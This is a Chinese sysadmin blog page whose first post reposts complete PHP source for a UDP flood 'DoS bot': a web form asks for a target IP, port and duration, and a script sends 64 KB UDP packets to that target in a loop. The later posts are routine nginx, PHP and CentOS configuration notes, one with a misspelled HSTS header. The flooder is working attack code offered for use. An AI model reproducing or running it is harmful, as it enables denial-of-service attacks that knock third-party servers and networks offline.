流水理鱼

PHP DDoS Bot 源码

2012-12-03 by wwek·2条评论

index.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
	<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
	<meta name="author" content="">

	<title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by EXE -->
<style type="text/css">
<!--
body {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-style: normal;
	line-height: normal;
	color: #FFFFFF;
	background-color: #000000;
}

-->
</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

function.php

<?php

//=================================================
//PHP DOS v1.8 (Possibly Stronger Flood Strength)
//Coded by EXE
//=================================================

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;



for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
        
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

隐藏Nginx和PHP版本号

2012-12-03 by wwek·0评论

nginx中
http { server_tokens off;}
php.ini中
expose_php = On改为expose_php = Off

CentOS 6 Setup命令不能使用解决方法

2012-12-02 by wwek·0评论

yum provides */bin/setup
yum install setuptool
yum install ntsysv system-config-firewall-tui system-config-network-tui

nginx proxy增加后端服务器获取hostname

2012-11-28 by wwek·0评论

nginx proxy反向代理增加后端服务器获取hostname，servername
server
{
listen 80;
server_name *.iamle.com;

location / {
proxy_pass http://10.96.1.104/;
proxy_redirect off;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
#这句就是给后端增加hostname 获取。
proxy_set_header Host $host;
}
}

nginx https配置笔记

2012-11-12 by wwek·0评论

server{
listen 80;
server_name www.iamle.com;
return 301 https://www.iamle.com$request_uri;
}

server {

listen 443 ssl http2;
ssl    on;
ssl_certificate         /usr/local/nginx/conf/ssl/www.iamle.com.crt;
ssl_certificate_key     /usr/local/nginx/conf/ssl/www.iamle.com.key;
ssl_session_cache           shared:SSL:10m;
ssl_session_timeout         10m;
ssl_session_tickets         off;

ssl_protocols           TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers             'ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES256-SHA:ECDHE-ECDSA-DES-CBC3-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:DES-CBC3-SHA:!DSS';
ssl_prefer_server_ciphers       on;

# HSTS (ngx_http_headers_module is required) (15768000 seconds = 6 months)
add_header Stricu-Transport-Security "max-age=63072000; includeSubdomains; preload";

# OCSP Stapling ---
# fetch OCSP records from URL in ssl_certificate and cache them
ssl_stapling on;
ssl_stapling_verify on;

add_header X-Frame-Options DENY;
add_header X-Content-Type-Options nosniff;
add_header X-Xss-Protection "1; mode=block";

server_name www.iamle.com;
#  ....
}

参考
Mozilla SSL Configuration Generator

Nginx+PHP 安装ionCube 笔记

2012-11-12 by wwek·0评论

http://www.ioncube.com/loaders.php
uname -a 查看linux服务器是32 还是64位的。
下载对应的版本，我这里是vps cnetos5.8 32
wget -c http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_lin_x86.tar.gz
tar zxvf ioncube_loaders_lin_x86.tar.gz

Site error: the file /home/wwwroot/whmcs/index.php requires the ionCube PHP Loader ioncube_loader_lin_5.3.so to be installed by the website operator. If you are the website operator please use the ionCube Loader Wizard to assist with installation.

根据提示选用对应版本的文件。

mv ioncube /usr/local/php/lib/php/extensions/

编辑php.ini

加入

;ionCube
[ionCube Loader]
zend_extension=/usr/local/php/lib/php/extensions/ioncube/ioncube_loader_lin_5.3.so

重启 php